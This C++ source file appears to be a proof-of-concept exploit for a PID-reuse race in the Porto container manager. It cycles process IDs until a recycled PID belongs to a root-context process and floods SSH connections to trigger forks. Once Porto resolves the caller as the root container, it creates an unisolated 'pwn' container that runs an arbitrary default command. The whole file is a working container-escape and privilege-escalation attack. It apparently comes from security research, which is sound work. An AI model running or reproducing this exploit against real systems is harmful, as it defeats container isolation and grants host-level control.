#include <sys/syscall.h>
#include <sys/wait.h>
#include <sys/socket.h>

#include <util/system/env.h>
#include <util/thread/pool.h>
#include <util/generic/scope.h>
#include <util/network/socket.h>

#include <library/cpp/getopt/last_getopt.h>
#include <security/pocs/porto/pidrace/portoapi/libporto.hpp>


namespace {
    const int kReportEvery = 64 << 10;

    char exit_stack[8192];

    int exit_fn(void *dummy) {
        Y_UNUSED(dummy);
        syscall(__NR_exit, 0);
        return 0;
    }

    void cyclePIDs(ui32 targetPID, ui32 pidStopDistance) {
        Cout << "current pid is " << getpid() << "...";
        Cout.Flush();

        ui32 child;
        ui32 minPID = targetPID - pidStopDistance;

        bool overlap = false;
        while (true) {
            child = clone(exit_fn, exit_stack + sizeof(exit_stack),
                          CLONE_FILES | CLONE_FS | CLONE_IO |
                          CLONE_SIGHAND | CLONE_SYSVSEM |
                          CLONE_VM | SIGCHLD, nullptr);

            waitpid(child, nullptr, 0);
            if (child < targetPID && !overlap) {
                overlap = true;
            }

            if (overlap && child >= minPID) {
                break;
            }

            if (child % kReportEvery == 0) {
                Cout << child << "...";
                Cout.Flush();
            }
        }

        Cout << Endl;
        Cout << "closing in to target_pid " << targetPID << ": Got child PID " << child << Endl;
    }

    void dialHost(IThreadPool *queue, const TString &target, size_t count) {
        for (size_t i = 0; i < count; ++i) {
            queue->SafeAddFunc([target]() {
                try {
                    TSocket socket(TNetworkAddress(target, 22), TDuration::Seconds(1));
                    sleep(2);
                } catch (...) {
                    // sorry
                }
            });
        }
    }

    std::pair<pid_t, int> dialPorto() {
        int fd = socket(AF_UNIX, SOCK_STREAM | SOCK_CLOEXEC, 0);
        if (fd < 0) {
            ythrow TSystemError() << "can't create socket";
        }

        int pid = fork();
        if (pid < 0) {
            ythrow TSystemError() << "can't fork";
        }

        if (pid == 0) {
            Porto::TPortoApi api{fd};
            if (api.Connect()) {
                ythrow yexception() << "connection failed: " << api.GetLastError();
            }

            _exit(0);
        }
        waitpid(pid, nullptr, 0);

        return {pid, fd};
    }
}


int main(int argc, char **argv) {
    NLastGetopt::TOpts opts = NLastGetopt::TOpts::Default();
    TString hostAddr = GetEnv("PORTO_HOST");
    opts.AddLongOption("host", "host addr to connect for forking")
            .DefaultValue(hostAddr)
            .StoreResult(&hostAddr);

    size_t hostCons = 100;
    opts.AddLongOption("host-cons", "host cons")
            .DefaultValue(hostCons)
            .StoreResult(&hostCons);

    ui32 pidStopDistance = 5000;
    opts.AddLongOption("pid-stop-distance", "pid stop distance")
            .DefaultValue(pidStopDistance)
            .StoreResult(&pidStopDistance);

    TString command = "bash -c 'portoctl list 2> /proc/$(pgrep pidrace)/root/err 1> /proc/$(pgrep pidrace)/root/out; portoctl destroy self'";
    opts.AddLongOption("command", "command to run")
            .DefaultValue(command)
            .StoreResult(&command);

    NLastGetopt::TOptsParseResult args(&opts, argc, argv);

    // deal with wrap around calculations
    Cout << "skip first 16k pids" << Endl;
    for (ui32 i = 0; i <= (16 << 10); ++i) {
        clone(exit_fn, exit_stack + sizeof(exit_stack),
              CLONE_FILES | CLONE_FS | CLONE_IO |
              CLONE_SIGHAND | CLONE_SYSVSEM |
              CLONE_VM | SIGCHLD, nullptr);
        wait(nullptr);
    }

    Cout << "spawn thread pool for later host connections" << Endl;
    THolder<IThreadPool> hostQueue = CreateThreadPool(hostCons, hostCons + 1);
    Y_DEFER {
        hostQueue->Stop();
    };

    Cout << "call porto" << Endl;
    auto[targetPID, portoFD] = dialPorto();
    Cout << "got porto conn fd " << portoFD << " from pid " << targetPID << Endl;
    Porto::TPortoApi api{portoFD};

    Cout << "let's recycle pids" << Endl;
    cyclePIDs(targetPID, pidStopDistance);

    Cout << "dial host (connect to '" << hostAddr << ":22' which is forked on accept) && call porto" << Endl;
    TString selfName;
    Porto::EError err;
    for (int i = 0; i < 1024; i++) {
        Cout << "try #" << i << Endl;

        dialHost(hostQueue.Get(), hostAddr, hostCons);
        // too lazy to implement signaling
        sleep(1);

        err = api.GetProperty("self", "absolute_name", selfName);
        if (err) {
            Cout << "nope: " << api.GetLastError() << Endl;
            continue;
        }

        Cout << "resolve 'self' container: " << selfName << Endl;
        if (selfName != "/") {
            continue;
        }

        Cout << "yay, it's root container, nice. let's spawn our command: " << command << Endl;

        Porto::TContainerSpec pwnContainer;
        pwnContainer.set_name("self/pwn-" + ToString(Now().ToString()));
        pwnContainer.set_isolate(false);
        pwnContainer.set_weak(false);
        pwnContainer.set_command(command);
        err = api.CreateFromSpec(pwnContainer, {}, true);
        if (err) {
            Cout << "can't start container: " << api.GetLastError() << Endl;
            continue;
        }

        Cout << "check this out" << Endl;
        return 0;
    }

    Cout << "something goes wrong :(" << Endl;
    return 0;
}
